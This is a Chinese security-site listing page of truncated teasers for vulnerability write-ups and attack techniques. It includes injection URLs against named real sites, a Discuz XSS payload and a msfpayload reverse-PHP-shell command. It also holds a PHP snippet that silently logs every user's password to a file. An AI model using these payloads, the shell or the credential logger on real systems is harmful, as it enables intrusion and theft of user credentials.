品道网某页面存在伪静态盲注漏洞及修复方案关注热度:30

简要描述：这是一个伪静态盲注点root权限 可查看所有数据库信息~~详细说明：这是一个盲注点root权限 可查看所有数据库信息www.2cto.com~~获取数据库用户http://pai.pindao.com/match/api/share/id/..[详情]

PlaySMS 0.9.5.2及更新版本远程文件包含缺陷及修复关注热度:22

[o] PlaySMS = Remote File Inclusion Vulnerability软件: PlaySMS ver 0.9.5.2程序官方: http://playsms.org/作者: NoGe www.2cto.com=========================================================.....[详情]

腾迅QQ空间URL跳转 - 网站安全 - 自学php关注热度:22

简要描述： URL跳转 作用大家都懂的...详细说明： http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_urlcheck?url=http:// www.2cto.com漏洞证明： http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzsh.....[详情]

深喉cms注射漏洞(bypass GPC)及修复方案 - 网站安全关注热度:17

简要描述：深喉cms中由于对数据处理不严导致一个SQL注射漏洞详细说明：global $db,$request;$keyword = urldecode($request[#39;keyword#39;]);switch($modelName){case #39;article#39;:$sql = sele.....[详情]

浅谈绕过WAF的数种方法 - 网站安全 - 自学php关注热度:32

Site: www.80sec.com0times;00 前言08年初诞生了一种SQL群注攻击，黑客在全球范围内对asp，asp.net加MSSQL架构的网站进行了疯狂扫荡。由于MSSQL支持多语句注入，黑客通过一条结合游标的SQL语句就..[详情]

Webmobo WB News System盲注缺陷及修复 - 网站安全 - 自关注热度:13

标题: Webmobo News System Blind SQL Injection作者: Eyup CELIK www.2cto.com影响版本:所有版本测试版本: All versions are Vulnerability描述Blind SQL Injection can be done using the.....[详情]

WordPress插件oQey Gallery<= 0.4.8 SQL注射缺陷及修复关注热度:23

标题: WordPress oQey Gallery plugin = 0.4.8 SQL Injection Vulnerability作者: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)下载地址: http://downloads.wordpress.org/plugi.....[详情]

不常用的注入–利用IP地址进行注入 - 网站安全关注热度:26

以前曾经QQ空间发布过关于IP注入攻击的文章，这种注入其实没什么神秘，只是很多时候被忽略了。 IP伪造有几种途径，一种是通过是修改IP数据包，有兴趣的可以去看看IP数据包的结构，..[详情]

php include 路径截断漏洞的利用 - 网站安全 - 自学关注热度:22

php 的include结构可以用于包含并运行指定文件，不过文件的路径在一些情况下会被截断，比如路径中包含ascii值为0的字符。先上一段演示代码：?php$s=$_GET[#39;s#39;];$path = demo/$s/;include($pat..[详情]

新浪3g频道注入及修复方案 - 网站安全 - 自学ph关注热度:26

简要描述：后台过滤不严，和一些注入详细说明：可以盲注，手工太费力了，所以我用了工具漏洞证明：http://3g.sina.com.cn/3g/site/proc/photoauto/model_type.php?vt=3id=1shengao=0xiongwei=2yaowei=0fuse.....[详情]

当Linux提权不能反弹Shell时利用metasploit进行提权关注热度:46

1 .生成WEBSHELL文件msf msfpayload php/reverse_php LHOST=你的IP LPORT=端口 R dis9.php我的BT4是在/ROOT/ 目录 然后吧dis9.php加 才能运行把dis9.php传进你的SHELL里 例如 www.dis9.com/di.....[详情]

织梦plus/guestbook/index.php页面xss - 网站安全 - 自学关注热度:23

plus/guestbook/index.phpscriptfunctioninit() { document.write(\rsquo;Hacked by qing\rsquo;);}window.onload =init;/script; 就可以绕过了from：t00ls.ne.....[详情]

Discuz 7.2 XSS 20110904 - 网站安全 - 自学php关注热度:46

DZ7.2/upload/api/dbbak.php?code=0%00%3cScRiPt%3ealert(0)%3c%2fScRiPt%3eapptype=1%00%3cScRiPt%3ealert(bincker)%3c%2fScRiPt%3e作者 bincker..[详情]

SaurusCMS-CE (CommunityEdition) v4.7多重缺陷及修复 - 网关注热度:24

标题 : SaurusCMS-CE (CommunityEdition) v4.7 Multiple Vulnerabilities作者: KedAns-Dz www.2cto.com开发平台: php类型: Multiple RFI测试平台: Windows XP SP3 (en)下载地址: [http://www.sa.....[详情]

WordPress插件Zotpress <= 4.4 SQL注射缺陷及修复 - 网关注热度:43

标题: WordPress Zotpress plugin = 4.4 SQL Injection Vulnerability作者: Miroslav Stampar (www.2cto.com)下载地址: http://downloads.wordpress.org/plugin/zotpress.4.4.zip影响版本: 4.4 (.....[详情]

记录uchome登入密码 - 网站安全 - 自学php关注热度:29

某些时候需要记录密码。在common.php合适的地方加上以下代码，记录所有用户的登入密码if(!empty($_POST[#39;username#39;])){fputs(fopen(#39;user.txt#39;,#39;a+#39;),date(Y-m-d-H:i:s,time()+8*36.....[详情]

关于ZKEYS虚拟主机管理提权及安全修正 - 网站安全关注热度:48

文章作者：knifeZKEYS 是一个国内比较常用的IDC虚拟主机系统原名：AutoHost后改名：ZKEYS 虚拟管理系统支持.NET 的话 查找注册表HKEY_LOCAL_MACHINE\SOFTWARE\ZKEYS默认会有 ZKEYS 路径找到路径后如果找..[详情]

家具地板集团网站整站v1.0 cookies注入漏洞及修复关注热度:55

by Mr.DzY www.0855.tv 源码介绍：全能型企业网站系统-集团漂亮大气版(双版本简繁)，最新优化后台及关键词版本，防SQL注入。管理员地址：../admin/admin_login.asp管理员账号：admin管理员密码：..[详情]

Discuz X1.5暴WEB路径漏洞及修复 - 网站安全 - 自学关注热度:44

测试环境：discuz X1.5+nginx 1.0漏洞文件source/function/function_core.php，代码：$_G[#39;setting#39;][#39;domain#39;][#39;app#39;][#39;default#39;] $content = preg_replace(/a hr.....[详情]

40位MD5加密的破解方法 - 网站安全 - 自学php关注热度:113

现在把40位解密方法给大家讲讲那40位的加密数据,实际上还是MD5加密，不过稍微做了些变动：以admin为例，admin的16位、32位密文：7a57a5a743894a0e21232f297a57a5a743894a0e4a801fc3当我们碰到像：7a5..[详情]

Openads-2.0.11远程文件包含缺陷及修复 - 网站安全关注热度:29

标题： Openads-2.0.11 Remote File inclusion Vulnerability作者: HaCkErS eV!L www.2cto.com下载地址: http://sourceforge.net/projects/phpadsnew/files/Current%20Release/Openads%202.0.11-pr1/Op.....[详情]

Linux减缓CC攻击 - 网站安全 - 自学php关注热度:17

首先安装iptablesapt-get install iptables然后设置规则iptables -I INPUT -p tcp ndash;dport 80 -m connlimit ndash;connlimit-above 10 -j DROP10就是一个IP只允许开10线程，否则丢包如果DDO.....[详情]

小议搜索匹配栏的注射 - 网站安全 - 自学php关注热度:20

当我们在对一个url进行注入的时候，我们可能会尝试get，post，cookies方法。不成功了还可以利用搜索框注射，那么大家有没有注意到一些搜索框上面的匹配栏呢，利用匹配栏我们同样可以..[详情]

mhtml协议XSS注入及修复方案 - 网站安全 - 自学ph关注热度:35

jsoncallback过滤UTF-7 BOM。但是依然存在mhtml协议XSS注入。详细说明：IE6IE7漏洞证明：mhtml:http://survey.finance.sina.com.cn/api/fusioncharts/get_from_data.php?sid=48302aid=18099jsoncallback=ax%2.....[详情]

XYCMS律师事务所建站系统V1.1上传漏洞及修复 - 网关注热度:32

by Mr.DzY from www.0855.tv 源码简介：XYCMS律师事务所建站系统包含事务所简介、律师风采、新闻中心、服务领域、典型案例、法律咨询、资格认证、联系我们等栏目。后台功能：企业信息管理..[详情]

YOTHCMS留言本可插入一句话缺陷及修复 - 网站安全关注热度:25

by Mr.DzY from www.0855.tv前段时间发布了此系统遍历目录问题。反馈后官方已修正。今天偶然发现出了新版本的Yothshop商城系统，发现可在数据库中插入一句话，并成功连接。影响所有版本。..[详情]

MiaCMS v4.9.0多个远程文件包含缺陷及修复 - 网站安关注热度:26

标题 : MiaCMS v4.9.0 Multiple Remote File Inclusion Vulnerabilities作者 : KedAns-Dz www.2cto.com# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@.....[详情]

NetSaro Enterprise Messenger v2.0多重缺陷及修复 - 网站关注热度:28

===================================================Secur-I Research Group Security Advisory [ SV-2011-004]===================================================标题: NetSaro Enterprise Messe.....[详情]

WordPress插件WP Bannerize <= 2.8.6 SQL注射缺陷及修复关注热度:26

标题: WordPress WP Bannerize plugin = 2.8.6 SQL Injection Vulnerability作者: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) www.2cto.com下载地址: http://downloads.wordp.....[详情]

平方企业网站管理系统万能密码登陆漏洞修复方关注热度:39

by Mr.DzY from www.0855.tv默认后台：system/login.asp演示网址：www.243-243.com最高收费5800元的系统。。。。呵呵~~~~www.2cto.com简单修复：语法是屏蔽#39;和#39;#39;字符来达到效果.用Replace过滤字符.....[详情]